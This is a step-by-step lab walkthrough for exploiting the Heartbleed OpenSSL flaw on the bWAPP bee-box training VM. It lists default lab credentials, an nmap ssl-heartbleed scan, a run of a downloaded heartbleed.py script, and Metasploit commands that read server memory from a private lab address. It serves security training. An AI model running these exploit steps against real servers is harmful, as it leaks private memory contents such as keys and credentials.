Heartbleed Vulnerability - Low Security Level
Solution:
Step 1. On the lesson page, click on the attack script. A pop-up will be displayed; save the file.
Step 2. Go to the lesson page and check the Hint.
Open a new tab in your browser and log in as per the given hint:
https://Yourbeeboxip:8443/bWAPP/login.php
For example: https://10.0.2.4:8443/bWAPP/login.php
Click on Advanced - Accept the Risk and Continue - the bWAPP page will be displayed.
Use the credentials bee and bug to log in.
Step 3. Open a Command Prompt and run the command below.
Command: nmap --script ssl-heartbleed -sV -p 8443 10.0.2.4
Note: Change the IP to your beebox IP address.
Wait patiently until the output is displayed.
Check the output.
Step 4. In your Command Prompt, go to the location where you downloaded the file in Step 1.
Use the command below:
python heartbleed.py -p 8443 yourbeeboxip
For example: python heartbleed.py -p 8443 10.0.2.4
Check the output.
Step 5. In a new Command Prompt, start msfconsole.
Command - msfconsole (I have already executed this command)
Use the commands below as shown in the video:
search heartbleed
use 1
show options
set RHOST 10.0.2.4 (Please change IP to your Beebox ip)
set RPORT 8443
show options (To check if correct RHOST and RPORT are set)
run
Check the output
Note: If you want to see more information about the vulnerability, use the commands below.
(Please follow the steps as shown in the video)
set verbose true
run